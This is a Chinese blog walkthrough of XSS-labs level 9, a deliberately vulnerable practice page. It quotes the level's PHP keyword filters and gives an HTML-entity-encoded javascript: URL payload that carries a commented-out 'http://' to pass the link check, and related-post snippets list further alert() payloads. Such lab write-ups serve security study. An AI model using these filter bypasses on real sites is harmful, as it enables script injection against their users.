XSS-labs-level9

最新推荐文章于 2024-06-16 22:45:48 发布
最新推荐文章于 2024-06-16 22:45:48 发布
阅读量79 收藏 1
点赞数 1
分类专栏: XSS-labs 文章标签: xss 数学建模 matlab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/131120247
版权

访问题目url

我们还是经典语句起手

<script>alert('xss')</script>

 发现不好用,我们还是去网页源代码看一下。

 发现可能存在过滤,然后可能还有链接校验操作,不解释我们直接去看看源代码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
  • strtolower() 将输入值转换为小写。
  • str_replace() 删除一些可能用于XSS攻击的关键词,包括"script",“on”,“src”,“data"和"href”。
  • htmlspecialchars() 将字符转义为HTML实体,以防止XSS攻击。
  • if(false===strpos($str7,'http://'))匹配http://

感觉和 XSS-labs-level8差不多,但是加了”http://“校验。我们修改一下payload试一下。

http://javasc&#82;ipt:alert(1)

发现不太行,直接跳转到一个空白页了,应该是把语句当成网址跳转了,我们直接将http://放在最后,并且将它注释掉

javasc&#82;ipt:alert(1)//http://

 

仲瑿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-labs之level9、level10
weixin_51520483的博客
05-28 246
它接受两个参数:要搜索的字符串(主字符串)和要查找的子串。如果找到子串,则函数返回子串在主字符串中首次出现的位置(从 0 开始计数);,但是并没有过滤HTML实体编码,所以我们还是使用编码绕过,但是传入的参数需要有‘http://’,所以在payload后面加上,并注释。发现有隐藏传参数t_link、t_history、t_sort,但input属性是hidden,所以需要修改为text属性。尝试了之前的payload,发现都不行,看源码发现多了个。发现并没有输入框,跳转链接,查看页面源码。
XSS-Game level 9
热门推荐
wangyuxiang946的博客
07-08 1万+
第九关过滤的很严 , 使用编码绕过 先看源码 , 过滤了大小写 , on 事件 , script , 以及一些属性 ,把参数拼接到 value值的时候 还编译了 htmlspecialchars() 把预定义字符 ( & , " , ' , < , >) 转换为HTML实体 , 也就是不起作用 ...
XSS小游戏学习笔记(level 1-10)
烟敛寒林的博客
09-21 3235
XSS小游戏 level 1 右键查看页面源代码 &lt;script&gt; window.alert = function() { confirm("完成的不错!"); window.location.href="level2.php?keyword=test"; } &lt;/script&gt; 即提示你要让网页弹框,修改url后面的参数 http://l...
XSSxss-labs-level9
Hugu
02-23 616
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
XSS-labs靶场过关秘籍(level 9-12)
qq_45741871的博客
09-21 1329
xss-labs靶场过关秘籍
xss-labs/level9
m0_71299382的博客
11-29 297
xss-labs/level9
xss-labs/level10
m0_71299382的博客
11-29 198
xss-labs/level10
xss-labs/level6
m0_71299382的博客
11-29 287
xss-labs/level6
xss-labs/level17
m0_71299382的博客
11-30 234
xss-labs/level17
xss-labs-master源码
07-06
20关xss靶场练习,帮助了解关于xss
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs.zip
03-18
xss-labs是一个网站,其中包含了20个含有XSS漏洞的网页,用于学习XSS
xss+csrf项目实例
最新发布
qq_64302290的博客
06-16 279
如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w提取码:4444。
Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection
weixin_42451330的博客
06-12 457
本文对Strict-Transport-Security(HSTS)& X-Frame-Options & X-XSS-Protection 进行了介绍,列举了常用指令及示例。
xss-lablevel11-level14
qq_64775230的博客
06-16 16
" onfocus=javascript:alert() type="text把这个填在referer里即可。但是t_ref参数接收的是HTTP_REFERER请求头,所以这道题应该是在这里存在漏洞点。所以真正的做法是:因为t_ref直接接收refer,所以直接构造referer。但是为啥这个网站打不开,反正感觉是跳转到这个网站然后再xss。查看了一下源代码,发现接收的是用户的cookie。而且大于号是被删掉了,但是可以使用伪协议。但是要注意的是大于号是被删除了。value里的是UA头。
XSS(跨站脚本攻击)
guowu666的博客
06-10 1410
xss基础
xss-lab靶场level1-level10
qq_64775230的博客
06-16 130
标签一起使用,以上面图片的html标签为例,标签是有输入框的,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码。">友情链接';echo '友情链接
ARIMA模型与ARIMA-GARCH模型预测时间序列
xiaowu1997的博客
06-16 344
ARIMA-GARCH模型
xss-labs安装
07-28
127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">' 通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值